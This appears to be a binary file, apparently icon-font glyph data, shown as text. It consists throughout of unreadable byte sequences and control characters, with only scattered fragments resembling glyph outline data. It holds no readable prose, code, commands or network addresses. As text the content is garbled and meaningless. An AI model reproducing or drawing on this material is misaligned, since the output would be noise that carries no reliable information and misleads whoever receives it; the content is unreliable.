��WjV.P^P.G/6//*;?>>�		���/;:.!$/O/.P/!"//6/;��+8E#54&#!"#"3!27>54&%46;2+"&5".4>2"2>4.3|��1BB1�,5C���v6\57\n\57]5$?%$?H?%$>7D""DB1��2B@-D4B.��7]m\57\m]5P$=I?&%?I>$��/?O!"3!2654&46;2+"&5+"&=46;2#!"&=463!27#!"&=463!2a�&**�++�Y��2��]��0��D�*�4+*�*��X�������(1AQa!"&'.+";23!26=4&"264&3"264&!"3!26?6&!"3!26?6&7!"3!26?6&4�q	�	�b	�	���"00D10�"11D00���		]�j	j	(�	�	�!�]!n0D11D00D10E0�##�##n##����1AO_!'./&#"26=!264&'&/!2673264&#"/46;2217+"5'46;2+"'5&?4;2}��
_
	F�#2#$#2#-��	pP�F;T.�%4&�;G.T9[

��$$$$0"
&%������������?h"276764'&'&#"'.46767632&/&#"32?67#"'.47>32&'&#"32?67�wfc9<<9cf�fc:<<:cf�* ()'	-3d	
++
,;('

/1d	<:cf�fc:<<:cf�fc:<��
-EIF
	

	;=u

	

1?M# 2		
;=u
	�9/;#"&=4&#!"3!26=46;26=6&#!"&5463!2&/'5'�2��1���z��.E�6-��|�a{{��mSm���,4'.#!"3767676?6;7>7�
F1��%;"C.NA4	g�D8Iy.7"<%��,7
=$


	J8 B%"/7��4�k1��5�n5���-B&""/&"276'&/"276764'&'&"'&'&476762��Y5�<�wfc9<<9cf�fc:<<:cfwdVS1331SV�VT1221TV'��X5�O�<:cf�fc:<<:cf�fc:<��31SV�VS1321TV�VT12!W%'&4?62276762"��B	l	e�
D��
j�	All�A	�������'?%!"&5463!26?6&#!"3!2654&2764/&""/&"���
f���g�kC�
�C
�i
e
I�f��f�mD	��
D�hf��F(;KXaj&'&''&'&'676?6?;2657>&'&%67/&'&'#6?'.2>4.#76&4626.�? ,#)�OQ !�
 ��d	0>  h @g!TT 3b�"8@7 !8 4Dx#22E41%#"1 $�%2�
!�r

�� LK X]-; PPJ<`0p4 4<5@ /B//D.� - -!���K"#"'.6762#"&547#64&#"#31267>&'."2677654&v�pD%L6##�(h(&&��
��"$854'%HPH�~1""1#]d]$��	�o6#__#�&&(,/&��

��/3 !4'^^&�}0��1#''#�	���+C"7>76'&'&"'&'&476762#"+";2654&�ueb;<:8bewzhbv;:dfu`SO/00.OR�QO/0[NRE;��;9actxhe<=<9�syhe<=��/.PQ�RO.00.OR_\�01c�<���4I^64/&""/&"2?62276764/&47"276764'&'&"'&'&476762�!
�
�
!�.=!
�
-Y
�Cwfc9<<9cf�fc:<<:cfwdVS1331SV�VS1321TV�
"��#
�
/>
"�-[
�
�<:cf�fc:<<:cf�fc:<��31SV�VS1321TV�VT12���!'77'?& 3254 &6 ���������e��������t����P�.�����������������.t�P�����+3!2654&#!"!"&5463!2%77'7''?'�''�'�R''�''����!��!�� ���''�((��'�''�R'��� ��!��!�����!!!77'7''?k��4����!��!�� ����l��4�`�� ��!��!�� �		'	7�%��%����&��&�%����&��&%�����4EW6/&#""/&#"2?6232?64/&47&#!"3!2654#!"&5463!2�3�

�	/

�

�4�

�	4�	
2",�p-@B+�.@7�p!!�4�

�1
�
	�3�

�3�
	~ @.�p.?@-�,�D!�!���+!!'&#"'&#"2?2?64/76?k���2
��3

��4��4����l����P4��4
��3��3���7"'&'&"2?622?64'&/&4?64/&"�+VA�A ��0�+VA/*WA�0�+XB�A ��0�,WB0,WB�0�� 9l�.'.'&.#"3!>&%4>32"'.'.#!"&'&73!2>&'.56&'&#&'67676%62546;276/&47]	J>B<?5K+3V2+	lI�Dl-#��,L-&B,LY#	._=�N?`"	
M7�9P,2:7>k(/;9?<B
2&�3$6kk�B]	- %2V3C5'Y.ALK~j-K, -K,

6�9EE:H@*629:cYC`':0[A
"o�3��7lk�� 9l|�.'.'&.#"3!>&%4>32"'.'.#!"&'&73!2>&'.56&'&#&'67676%'7#7767#'635&3>]	J>B<?5K+3V2+	lI�Dl-#��,L-&B,LY#	._=�N?`"	
M7�9P,2:7>k(/;9?<B
2&�o#L #4'# 		K6D5'"�B]	- %2V3C5'Y.ALK~j-K, -K,

6�9EE:H@*629:cYC`':0[A
"o�M
:�
K9=�� 9l�.'.'&.#"3!>&%4>32"'.'.#!"&'&73!2>&'.56&'&#&'67676%2?;26=?64/&]	J>B<?5K+3V2+	lI�Dl-#��,L-&B,LY#	._=�N?`"	
M7�9P,2:7>k(/;9?<B
2&�3$6kk�B]	- %2V3C5'Y.ALK~j-K, -K,

6�9EE:H@*629:cYC`':0[A
"o�3��7lk��=Z.'.'&'&3!2>&!".67>7>67676'.76&'&&3!>&\	K@C=?6Ei	8&.oI�Em."`>�GAa$'5		4K+0<:@=D
3'�
<7?m)3R3
1)O7�;P,�D^
.
LD/�MM���:EFwo&*>	1\B
#p�Db(;?7We;:fY���/3TX."2>42'&'7654&"'>6"&'.'6=4/&?326?7'7�"v���vDDv���vE�JF1+3���\
�.l�f�OF1*2���X�-m�c�QvEEv���vEEv��51+l;h@C;\tS�#%�eKb�51*i:hAE<Ys
S�#&�bI^����'AQU=4/&?26=426?654&"?6=4/"32"!"3!2654&!!���
7
4|��7����*P/11/O'x�		
�&P&P/22/�g��3A���,048./!"376?6?636232767656!!!5!7!5!�!�*�G�	0�0�*����s��V�
�	�	A�
��D�D�C���)KT]ht�2767654&'&"'&'&4767>.'&/676?'&".6&7>&764'&'6'&'&'&767'6�q�9;;:df�fd;<xejhfWU1310SU�VS1320RT
'M26S)fXBI~p-9.		
�Q	"
s`d�gc;<<:bfux�:<��10SU�VS1211SVdaUS24�&J8RS
	o->z;:I#
		�3�2�!	���+<A32767654'&'&&'&'&547>2&'%"'%&/�veb8;<9dfxveb:<<;dhr]OM,//.��OK[XLQ��4'�W��!�=;bfuxfc9<<;bfvxgd:;��.-LN\_PMY.,�X\�01���gT)�-Z9X����'05!3!#"3!26=4&+5!2765.#!"5!z��X�Y�����=))=
3�������%&"'&'&5654&'&547673>?65?6='&'5&5'0#&'#&#'&+'.#"7>'.767676>'4767636716?5632676&u2.B4 "	
	?H=:#
&&+'84..CE	 	-

>7
91� %40LF
			+#9EDD>'+
o&A<	/%

CB0$#5!< #G����'+!"3!2654&#!"&5463!27'35#���	

	>



�	

	�

�0@@~������
�N


�	�[


j	

	�@@|����!���)\iw��"2>4.'&7672?&'&>32#3#'#36+3!2654&#!".4>2%2;>&'#"2>&'&#"3622;264&#&#"d&@&&@L@%%@+(7& $

�9)
*<: , 

2
*8	Y''��'�.N./M\M.-N��@x�
vA-y! B

:,�(COC'(CNC(�!,"%%'�F05"D'>3;.,;&�'&��0QaQ//QaQ0�������'+5!3!#"3!26=4&+5!2765.!z��X�Y�������=))=
/�����3X"'&'.476767632'2>7654'&'&'&"7#".46767632.#"3276�_SP:8@ :<NS_c�:7""7:�`P�U+)B@�?C)-.Y�%6%9S8*'7+2"
'49<0X"!;:��RM=< "B;8SN�NQ9;CX7[B>LJ@B---0~�A?_6� 
'AXbV#!6
D?C@��	#4&#!"!3!265+"&=46;2�+�&*k��*�+����=**)y��++�2���?O%#"&54&#!"&=4&+"+";23!2;26=46;26=6&)"&5463!2��	
	��	
	#	
	�


�


a


!	
	�	
���		


�
_


�	

	�	
	"


��


�


�


!

	


��	����,<.>'.'6&'&73!267776&!"3!26=4&�
�On
#n�c\
$���,�#B"
#
"��d��+�V66��o&945&?%65%&'.654&%6&#%&767o��Hd�r��
	`T)����-]\�QT*����	�Xc�������
�6j	���!4FVi}��4#1"376?65'&/.=4765"/&767<#63767675'&/&=47&7676'#&'&74=41#631676'&/&=4765#&/&7��(OJ�;t
����~?PE�JO(�\S

��f\b0

���A�jW�+V8
��/^4b1�o�.+r!D�k�uoTH%0&�o�+.r41�n�Ht<48	oon%J�<4x2 �k�t68o	����!)3}���&#!"3!26542"5&6#2"&54#2#"&54#!"&5!>'&4767637>&'&767>364&#"/&76.#'&'7674#/&5&'&'7676&'"7.76�
#���-D
:
��=�E
3
$!6
2
	$�&&" =
#1Z!"&.5#���??
.

.��

�'-$'
 H#*7l&-"$)�
	4:
"*(Ck '$?"Fr
j'(�V1D676764'&'&;265676&";26'&''"7>747�	<ORU[P�=%2�``]�""	3��d
	
��2,H�RU�]/		V
	/f8
���X
��*#/<@DHL&/.#!"3!2654&3#'3#'2#2;&'676'>3.!!!5!5!5!5#53 '
"�c$�00D00�"J$#*0$Q(��^��^��^�//�&-���%�H���"1	$'41�&�&+&����x/CWc27>=4&'&"27>326=6'"'.'47#"'.'327.%&'#"32>54&##5#53533�bTQaaQT�TRaaRTbB<Q0dNR�ROdaRT�17]ROdaRTbnT)2&31%
)6$=$2,'++',�=#l$==$l#=�	(1XX"77"�$=N7"�$<S�&%07'$>$0`++',,��w
2Gdx%"01354&7&'#"32>54&+"=4;54>3227>=4&'&"27>326=6'"'.'47#"'.'327.�&T$3/$#/#<#@P��bTQaaQT�TQaaQTbD:Q0dOR�ROdaQT�17]ROdaQTboT*2�
0$#/-$#<#/�4
L=#l$==$l#=�	(1XX"77"XX$=N7"�$<S��w,I]%&'#"32>54&#5327>=4&'&"27>326=6'"'.'47#"'.'327.Q%2/#/#<#2xx��bTQaaQT�TQaaQTbD:Q0dOR�ROdaQT�17]ROdaRTbnT)2�%$/52#<#/Z"7=#l$==$l#=�	(1XX"77"XX$=N7"�$<S��^,A27>=4&'&"%"'.'27>=4"'.'27>5'�bTRaaRT�TQaaQT�dOR�ROdaQT�TRa��]ROdaQT�TRadOR�=#l$==$l#=;"77"XX$==$XX��7"�$==$�"7��)b4#!"3!25'"# '"/&'&'76?676373"'&'&"2?622?6764'&'&4?6&/&"� ����Z/� 6����B�K
mگ�#4
F"	hh	h
"C
	"Fh	q��		\1��E	�Ma#5F$
j
j		j"E		#F
j	����,<KZhw2766&#!"7'.+"2764+'"'&/&"3!26%;26'&'.&/&;26'#"6?676&!#"7676&]'X1b������fV+�Re2(-E48�L a�'+�0I6���
HG'���'GH�4i�����
��s&
�,#DgNV*�1�io�%ImH��mk;g44g;km���$-6?T^gqz�45&76'!3!26".6.46'".62".6.>&/.?6764"&5>23"&>2'462."&467"&>2�%��
56_!�&V}�"Cf'E��&'�@�l� 6 N l� @�@/
1�27a" �� �! l"G��$FjH��'(	�B+=!!"���!a!"���'09BK&%&6766&.7>7.>7.>.>7.>7.>d���3#"k$)
(CEX%��CJ#CI$5CJ#CK#4
CJ$CJ#�CJ$DI$5CJ$CI%4
CJ$CJ$r5h
$8p��(C�$)�))C�=$$D%#$D�$$DJ#C�$$DI$D��%$BJ%C�%$DJ#B�%%CJ$B���/<"2>4."&462&'&'&#"2767654'&".4>2�11:11!!-  $&-3:<?wfc9<<9cf�fc:<! ��)E))ERE))E�1:11:1�!-  -!f' <:cf�fc:<<:cfwWPL�v)ERE))ERE)���&+;K[k&/&+"#!"&54&+&"!2654!!#";26=4&!"3!26=4&!"3!26=4&!26=4&#!"�2e
	�T
3<�m�t��K		K		Y�

�	
�

�	
���		�		u3e	��			�
 CB	��~���
�		�
�t
		
l				�
		
����'9IYi5354&+54&/&'.#!"#"3#3!265%463!2!%!"3!26=4&!"3!26=4&!"3!26=4&�p
&��p��%�'�w


	�Zg��-��-��-@!=w	.
	��!��4!:

��DJ����'09%"'&4?6246;2762!5#"/462"&'462"&{��;�
c�:��j�pq� �m9�w

���9���mme����+%2764/&"4&+"'&"!5#3!265�&;�
b
�;t��y#�#�9�l

���9����$$�� 9l�.'.'&.#"3!>&%4>32"'.'.#!"&'&73!2>&'.56&'&#&'67676%2?64/&""/&"]	J>B<?5K+3V2+	lI�Dl-#��,L-&B,LY#	._=�N?`"	
M7�9P,2:7>k(/;9?<B
2&�6�"D$ *�B]		- %2V3C5'Y.ALK~j-K, -K,

6�9EE:H@*629:cYC`':0[A
"ow�!!@&0���c'&"#&'52?64/&"2?#764/&"2?64/3'&"2?64/&"56732?64��#S�#Y#��#S�S"��#Z�T#��#Y"�Y#�g�#S!�Y#��#S�S#��#Y�S#��#Y� Y
#����G'&#.'5326/&";#54&6=3#"2?6&+5>73?64���:)����):����:)����):��r��)9����:(����(:����:(�����/G_7622?64/&"2'&"2?64&4?64/&"2?64'&""/&"2?64'~i
i�
�
,�
ji
���i
��
n
i
i��Eii
��
ܚ
i
j
�


j
�
�
vji
��
���,7!&'&'7'7!7'7'!'7'>7!7"&4673����#�
��
�#2�ʛ���62#�
��
�%23���K!/,+.	
�#4������2#�
��
�#2�˛���42$�
�P/@..A/���$,PTb���������236&/367#&'3.'&676&>'623?67'6'6&?#7"664'73'3/?'37'775'57'/7#'?'+?'575?#7'7/##33357537567'7537'#/735/37'5'5'#?5?/?//?353'"276764'&'&"&'813/&/4#'2&'276/26?4'&67674?656/&5&'&/501'#"5#"5#'##6&&6&6'.'&5'"5>7632"#73#7"33#7"6'6?676"&#'365&''&7>?6763727>&'&'&'6/&62/&/&#/&#.7&#";?27322121"3725743?4?674?>56?6/&?6?6'5"'"5'&/&/&/&/&/&'&/&43633?67676'&//&'2766?6'#3�n	$p1(
�
/I	
�6wfc9<<9cf�fc:<<:cfw8i,!

	


fHKT


		
		

	


	 			


B




				 #10QT/?a6
H�
	=
7J	I
4


t
s
	(n	+�V<:cf�fc:<<:cf�fc:<��"

	
O�#%
	

			


	
	-






		-k9bTQ01���<)7CQ_!"3!2654&"&4627!!?66=3!"3!2=4&!"3!2=4!"3!2=4&!"3!26=4��L�����(OO59�h��h��h��h���$��7��QQ��!!S!!U!!S!!���-A##!"&546;27276?6&#!"3!2654&;26764/&"����	�P
7/��N	��	����|��Q�+8/��k����|���!"3!2654&!5!%P�H%44%�%55��h��m��5%�H%55%�%5�~DM����
"z���?2?%677>/6#!"6767676'&'&'&'&6767673623>'&'&76767#.'&'&&/"/&'3!676&'&7&'	

�0.]�\		�*��(E(+

)

	
	%


*!
g�/�� "?�ު8ri��

I>.]�]	�

)(!Z	"
d
 &*"	
����
>�:r��U�����%1=%"'&3!2654&27%6=4&#!"7!2#!"&46!2#!"&46
	�w	
4	�RJ�l
���~��~��@���	���b��-&'$'&3!2654&%27%65&754&#!"�;��8	

8

	��	��i�	���
�
�t

�
	Ur�4f�)
R����6:6&/&'&"3;62?6#'#"'&'&676762!!�##6H#%c&��h%%,-+X+8�x�:

6mQ	7�,	�Q��v$`$6G$&&��g%c&-,�v�:7B�+�	� �%''7'77 x��x��x��x��x��x��x��x����x��"#&'&'&''.+&3;276&'&'32726=4'&'&+##6?676?6?67>&727;#"#"+"'&+3!2>'.�,X0O�B
')#t� [-&
�@bg�T,'
	!
��L
��YZ �	T��
W�("0*G%	


HD#%'""�	<[�'A08

#!((P*#�
$��;!764/&"2?64/!26=4&%'&"!"3!2?64%��k-��-s)w�-k��)s-�=k-��-tL��-kLt-����-"276764'&'&2"'6""'&473623�wfc9<<9cf�fc:<<:cfw 7X#"&###<:cf�fc:<<:cf�fc:<���r��>?���%!"3!2654&2"'6#"'&4762i�&&�&&�p 8X 1 %�%%�%���r�� / =����#2%&'&'&&'.3!27>2"'76"#"'&47623�q� ����G2A    (��
�]$>��G�555�%27&"&"27654�!K]#5!!5#���o?#5!" ���+64'&"!"3!27#3!"&5463!���9���

v�9����$$M&;�
b
�;t��z$�$����0h��!&/4+"/"##&'""32325%'&5&"5?676&/#&574&+"3272?6?6?57672?4376;265?4+"/&/&+";25'46?>'&/4326?5#&�N�=,B/^�5g!��^/B,=	�N
>5$W�^/B,=�N
>5#Y�=7 l!
N�	=,D/^
\EWk!&9DC8&!eWQ>(�C8&!iWQz	(*QWf!&;C���'I#"#!"&5463!26=4&#!"3!2654&#";22?6;265(C
	�					�x		�	�		�V�	T	_	��		�		A		�*

�	�	S�
V��		k���3!"3!2654&#"&=4&"/&4?6&+"&=463!2i�%%�&&]S	�U�~		W
	&�&&�&�	�U�	R	��	���,<33#&#&'&'&'&767672>4."77.67>�6:7��:;Oo_a$620��$Qoca�8`q`88`q`8�$K/"(R3P�C�HIbG=@�!,*aF>��8`98`q`88_=76) E
DU!��)4E&'&'3654'7676&'#".6&'.676767&�(.1:?P3T�U�V^�u�i7>4�s->(=*3�!�
	Bf"TH??)+L%=d2T'��#�`&�K/ 2+M�&�
	M"	3T0$���>L&'762?6767>/&#&#"&=6'4767>276/&7%23=!E.5:=eȗ5iz=#�xzp�e7&32J5/78
=dɗ7H$
|?.�{�o��J"09'&'&476?6367676&'&'&'&'477>4&"�Ԏ.(u��?,q�

i�V4O,8X�TT(gA	
R�"J}'@�##�.K�(��e>#3�22TS4
#M
N����06?676&'&/&3?6?6762&/&�
:rQ�
�;"
x;�>|C@'vB
A�+�#1b8
?�F
��g5���,;IXhw�������#"&=4&#!"+"3!254%46;2+"546;2+"546;2+"5+"&546;2+"&=46;25+"=46;25+"&=46;2+"&=46;25+"&=46;25+"&=46;2+"&=46;25+"&=46;25+"&=46;27#!"&=46;23!26=46;2%#";2654&�O���[�c������j�BBBBBB�BBBBBB�BBBBBB�6!j!���
�����>�8
4
��D��ADA=A��ADA=A��ADA=A;1n�v��� &/.#!"3!2654&
 &
!�o
�&-���%��z)6CP]m}������3!2654&#!""&=462'"&=462'"&=462'"&=462'"&=462'"&=462!"&5463!2!"&5463!2"&=462'"&=462'"&=462'"&=462'"&=462'"&=462n
��6
b






���

D��
Dt




��

*��
�

�
��
�
�_
��
���
�l
�

�
��
�
���?676=476.#!"�	sB��v�s�	�X
  
���-Q76'&'&76&'&/&'&'&7&767676&'B""9*
%		2,�	$"'�.%=	



#4
	�/-20)(.7(9JIEF<P5�!%&"@!!%HAUJ+B�2.,$)!$ %$		
����%&'&'&/&67676'&/767676'.'&7676?676?6764/&'&7676?'&'&'&'&767676'&'&'&'&/V

#3		$	
R*#!<0				)B	�!!/(2$+C

6		�
H;�7,(	')
	<U$"
	
 #$:4&$
���8!!7;26?67676'&'&'&'&/&'&'&'&��RK%#	W!(
7( 
$H 1&&
"6�'-��3'*+*
P;L

)8*1,VP:B4M��-&/4&"3726'-h��>�>=�&+$��S��=)KQ&'&'&/4#?265767676766'%67'/7'6767&/6&''6&�*,%+3J'@8
:�:;:A'L4,$,*�q%F	A";77;)CC*7557/=>.754�

#5
��
K#
	

"eeqd!!B :
dqr xee��?*&/&'&'&/4#?26576?676= 
.1,134K9$:�:=VX85'%#xG��	
)
��
V$��;6\}/&'&'&'&76?6743767676?676'&2;6'&?6'&/&63%476?676'&/&6&'5&�*3

+&/&'1		

$��==%	6(�i
;	
+#F7+MFUnsK;18FE3>-8.!2GF��
-5U&I	D%1um	
idF2:0%$���*.<M]!"1;2657365?54&"&=4627!5!'37>/.26=654&#1"2326?6.���
M
�
M
�



���"�	
\A
�
I]��

]I
��
S
�%]	;	<'?;
;	���	!'�����o'F�� i
i���a$%&/&53264&+";3273276?<�

�		*<v!DQ��QDI*S�g	
	��=S�/4==4���(1.'5##335>735".4>2"&462\
S{J�J}T
LL
T}J�J{S
L�LHyGGy�yGGy+>++>+�J{SNM
S}J�J}S
LMS{J���Gy�yGGy�yG++>++��354&+'.#!"!3!265ɴ �'��!_�v+!� -�G !!�%��`��!'.#!"3!2654&v��$��\""��""�"��|4Pi%>'56'4'&'&7676.'&3676?601.767676'&'&'7"'&67676?'&'&�6 .E
0!'O-#4%'		��*C3"@
	�$?1+#�6G#E4FG.HI�
�)8	 -N2.X&2@Y�R

N%D


 !
�
	:@-#
"!*
�jxR/?k��#"&=4&#!"+"3!26=4&'#!"&=463!2!"3!2676&+"&/.?6&/&4?6/.;2?6'.+"/.?>;2?6/&4/"/&67676?>/&6?6)=	/ ��!.	= .	�	.�	��		3	��7
>
>
?��	N/?		1	


2I A�'			�	!..!	.!;		;!.				�
��

f
�+	8
#	�	&
<	8�>9.
K���y�&6?>/#"&'&=4&+"#"'&/"+";22?67632;26=476322?4/.>;26=4&+"&".4>2
0�1

�	
8�7EE
8�8
	�

8�8
D

Dh5[l[55[l[5�0
�0

D

E
8�8	

�
8�8EE$
8�8
�

s6[55[l[55[���
��#&'&/.#'&'.'&'&'&/76&'&'&"&/6?>5&74&'&/7463>?6/7676?>?3?676766.'&>�
:
B 	FO
\	O"-	>W.*b		
.G
.\
ND
	@$��%A&)E)$A&)E*�"$
30D
	k)+
CdJ2O	f0	'kj	D/*

�&B)$@(%B(#@��������%&=4?67'.#"'&'&76?'&'&/&/&'#&/.#&'"372?637>?6767'&?>326567'&.7>376767637'&'&7>3257'&6<?6?&/.##'&'&?'&/&/#'&'&#'&'"3673627676'>.&/&75&?'&#"'&'&?67&'&&'#&5'##'&'&#&/"#"376737632374367667'&7>37257.>B,	
<5,A:C	4	<"
)	
��&7:*&7<4(
	+
#
(

'+

	
 &4$&4$	

	
	�$�2	
/

	'H	-D5%!1
#
-	*G	D19&)49O51
/	"
	
-//"



�#%4#%��

 





!
##���$.5<CJ2764'&#"&"&'&#";372+'6#"'&5432!5!"3!!%!!54&!265!�662-&:&-166�J�66}6�y7F6��~�� 6!�����} �� ��`HH�W�m6462�m� ��!�ۥn �o!���A/./&'&?67676?676'&'!3!265&'&']	7"�� 7	"	3"-
+j8		=4^O��V_3>		8\1���
);Nat�������#6."27676764'&#"&'&'&67676&=4667676'&'.676>2+"&767#&/&'&6;2/&'.67676&=467'&'"&=46;2'5463676+"&7&/&'&6%'.7676+"&767>32&'&'&66?6'&'&66?>&7&'.76746;2)<���xD"!=<��QL?<!##"^2��! f =
'1n
z1&
n _<&1nz1'
	n�$�u$}	^3B^	2		
%�
 #|	^2�;CCv��NL=;C" <<MQ�QN�B=	
	HV)-SS-�a5(�`2*�R.VR-�a'5�a$9�0	t	>AWG�D:	HV�
1o:EVH���!+G#5#"&46;5##364&#!"!4&3!26=!326+"'76'.676/7Bx�T�����$
$�|Q9;;fM=�)mM	�	���$%�+!��;
#54."#!462#�":D:"���W9R9�Y@!9!!9!@�O�(77(@��L<""&54&""&54&""&=4&"'.32767654&	
*

*

*E3,	�':DcjA1��

?��		@��		��[]5�<%1&@*+��K4H%"#"'&67%654?67>..5>76#%!37676'&/&3�3f		


/% :	%
Y��gY�X

��	u(;
u		
#4( 4&		q&0&1	:u	���#3<EU^g763!2/&#!"63!26/.#!"!"3!26=4&"&4623"&462!"3!26=4&"&4623"&462k
�
	1
	�p2�x�#x����,�,L����,�,�66��	�2���,,,,����,,,,���D+&'&'&'&/&'.7>76?676&�
$.4T)^GtLW�'<y`hV"/9l4'm	 $)/L(^�XJi
OOyPZ�wn+.3b3$4����67>"'&'.7>76�$,sp(^'L`�"�pTE#Y>�SS*$!)a�W]sdizY�Q9E	�����>T&'.'.767>."'76767676'&'.767645'.;>.+56�xX�fbz%

&
:	97OPVO~Hj��RB���dv�q
�
x��[C(&�h(
(
6UA?
]�P�ax*?�s�B


�>����:'6=4&+"'&"?;2653;2654'6?6&�`
\
�		�p98
���

2�D�

>��P(
P��

&��P
H

����^�%4&'&/&/&'&327>76?637676?6767676/77>%/&'.767676?7636236�M	



"
B8ho,	.%$(6 9A#A��:# 2#	)
#&1�<+1& 

k?CD$!
	 %+""
#F#1
`(	0
	D��!Hl�76=4&+"2&"&=4/&4?6=462764&#!"2"3!264'#!"&=4?64/&=463!2'&+";26=4n	�
m_		_	��	_		_	#n��	�		�	H	�		�	?4t4	��b	b��VV��VV�
*�
ww��ww
:..
??
����/8AEIM!54&"!"3!2654&%462##!"&5463!2264&""354&7!!!!!!���8P8��

*�**f��,

���$$2$$(8�8�a��a��a��O (88( ��
"
'%��

��%2$$3$8(EE(8�'^&^'����#-=M&"/&'&&"&/&'!26'2656.!"3!2654&#!"&5463!2�
	
$

(	"k	�'55M85P���H�%
*/
00<R$3&(78M4)�v��|/���0N4/&#&#32!'&'&'!?>;'""3!2654%2?64/&"54&+"'&"��;0n@!��"$ ��^m/;��M�)a
E
i)	�/V*2,~/�
q���(_�

��f(�DI'&'&'&76?67676'&/5&?7>'&'&'&'&'&767>�
	$+.F]&-;0;R97l).HYJ81	;C$	X$"/'|/27742:8,gc(�)	

S]C
*8J?D	<p;d&=
>"B

'/I+S
3�<%*C@AD-$",���-H"276764'&'&2763622"'"'&4#&5474?35#'&5&54733�wfc9<<9cf�fc:<<:cf�

!

"	��00�0<:cf�fc:<<:cf�fc:<�
5��

�

��	
���"<!"3!2654&6762#'&4#&5474?35#'&5&54733i�&&�&&�/
!
4��00�0%�%%�%�
 	5��

�
�����1%&'##3#!65426767564'5&'&'&"�L�MM8�55�#

��
%!q
4'P&���+;K[k{2/$'&3!"3!26=4&%3!26=4&#!"%2654&+"3!2654&+"3!2654&+"3!"3!26=4&2654&+"3�����+=��		:		��	�		�+	A		G		�		F		�		G		�		K		��		F		hl7��v		K				;V		��V		��		V		��	�		�+	U		��	����&.84'&#!"3!72652#"&54#2"&54#2#"&'4#!"&5!�$�ci5��:

:��
=���?6.��
���
8."/&!!26&/!&'&&/.3!26?6&�	*F G*:����	U��U
�l�
FD
�t$�%�	BA
��--�,
�

�
.�����$��353326=65#%#;5326'4'&/&/&'&/&'&'.=4.'&#3676?>327>=33276767>=6'546;63"&462f
	S
}}
S	
I$&

zqce	|8>+#;:
~�u$11H22F

-

_ @XB�z=		!		# 6
X��Y�<�g��-4
 K?�	&M��
��5!3!2654&'!"!54&��q5*�* 6��	�	s?@2���((1$'�
<<
��R&52176&/&#5#2767654'.".46762TB��BIs !0.OR�RO.0" s�I{HH=>�>=HH{Wv:;vbDFN_RO.00.OR_NFDc��H{�{$%%${�{H���-W`%&/&3#"/.?6&#!"3!26'.+"!";265463!2?6;26'&/&'&;2� ��L@L0���6�-�-�5��w�v�Vc[Q��D�������c������"3!2>54.#!".54>2?-L--M--M-��-L-;I"+!8B9!#Fm��-M--M--M--M��>&!8!!8C9�����.7727747476767>'&7>'&#&'.7>.C
[":*{)km,>>,/�P	��	
%J�:*(:(lZ[ (&�c!)�FH<B4��T'9*&:����&&'%.37676&%.>�[���
%o8
dt:�\
	��r0(2(WD��1
�IJU+�D	C�1(2��9%4=46;26/&'.+"'";2+"3!26=4&+"&5.�
8�i'8�
/

/vGF'

T�n��"
�>
0

1��-#
'%''%'���L�K���II����II�|����qE1ww1�E2ww2����!!%!!%!!!!!!%!!?��3��3����k����r���q������4�3�����F'&767676767676?67767676767676'�%#0't_WE>.)e[NF70"$28DIVY2;50(9km[XG>1(
�	

)$/(/&(
	
!&$*#,#0-B9#G 1'(8A7;01" ����%%%%%o��&����#����+-���&0P\5&/&'&'&'%5>4&%5>4&'5'45&567>767676'"37%rJC;u
59.("Ayy�g��))E�
(
lN
�W++��F�
'+�82"0&=!%*	�
'0'	�22�#*#��+�-@-�+7$	
3.9�/B/�+�+��*[#"&5'4&+"+"5&5&+"+"3!254&'6&#'"&=4&#'"#'"&5474&#'"#'"3263�t�<2�s�<
��j?i		


��'
���,;JYhw��676&26'&67676&'%&76767674&%&'&'&?>'&'&'&6?6&%6/.7%6&/&%"276764'&'&"'&'&476762�5F��,CO�(++C:��h'���+5	F�� +CO�(��)-C:Hh��#wec:<<:ce�fc:<<:cfwm^[5775[^�^[5775[^*)-C:Ih��J6	F��(,BO��(-C:��g�	���I6	F�	�!+BO�)�;:bf�fb:;;:ce�ec:;��75Z]�^Z5775Z^�]Z57���!%)-1U&54&#!"3!>74'&!!!!!!!5#!"&5&?'67%67>'556
��T!
	
%&����M����M��?
�$

G1��
+.�<��0'x�

r+.E/E.F..��
Q+r&U]�
j
��#.7JX%76&/5##5#";!"!5#54'67&/5"&4627&'5761?36'&6?676'n;�)��


���!?�d2	�	#A[		
		�CD+1$1/G�	J�)�
j

C"�p1 
"�:8E�	
		
	V)
\h			�����#3CL\l|�����#";2654&#53#"&=46;2'#"&=46;2#";2654&"&462#"&=46;2'#"&=46;2?>'.5&/&6372'&/&6?6#";2654&'326=4&+"7326=4&+"�q	

	q



kk��xx�r	

	r	

B7��xx�q	;	q	;��x	
w
�a�������
	��


	
��TJJ{
	��


	
��9TJJq
	��	
		'R
	J
I��
	�t	

	�	
*TII��%Gu��54&#!"3!6!"3!6"3!&=!"&5463!254&#!"3!&%&76'.&?626=67>767>"&4627"&462���$W��S
��M=�


I	&.
	��

C3.5
	+
+�)9:R:.3-@--@-, \,!c*	�
	�	
	 (
�	

	��	
�
04
�	GG	�
W:S99).c --@--���*Ey����&'&'&76?6767627>&'&/&'"'&'&476?&76&?6676'&'"'#&'&/&'&''76676&'!767>'&767%&'&76�		Qa��
		
\X	Pe`�J

Y*
'38
hk
	

>9
	.3G�Q��Q>�QU<#%.2%0��3!.!1
�FUNNJ8%$cgm;e	

����@,<




~����'kk	53	
opJPXYQ2$�9GM?.DTP�;BSO�>"Zc.+�2
+$%6���&9MZm"276764'&'&46"'&'#'>7>#"&#"&'.?>3#'".4>2'&4767>372�wfc9<<9cf�fc:<<:cfx<p/

>
=O�z.'	>
	$
Y�E�5>	>N4X44XhX44X�?
	$
Y/'	<:cf�fc:<<:cf�fc:<O/'	
?
-!�=p.

>	/<�d0,	>
	-",1�4XhX44XhX4>?
1<
=p0
�k�Q%AJNRVZkt��.+"#!=&'&'"&462!54&'#.54?654&+"2"&46!!%!!!!%!!5!3!276767%"&462'!3!276767'"&462G`$	-! 6�4


��7A-	$`zD

=��N���N���N���N��N
*
��

��N
*
D


5
$BNC:7"
�	

�



"rBNB$
�

	�

p@@@+???Ƙ�	

	`

B�	

	`


���CR��������$2267>767676?>7>4&'&/./.'.""'.76362>&'&"'.'&6764'.76767636&'&4762&6762#'"'&5&7476'&'&47>'.=46?66'.46&6276"&7"'.?>;27&764'&6*&/&67627&"&7>2_
-*&#,,#
(!6QfQ0'(#,,#L1
QfQ�
		8	
h�q+jj�jj�i8u7ALA�A�Akk��
kA�Ake7u8ALA�(&1
QfQ
-*#
#,,#
'*-
QfQ

1L#,,��	
48
		G

�k
'
kA�Aj�kkA�A
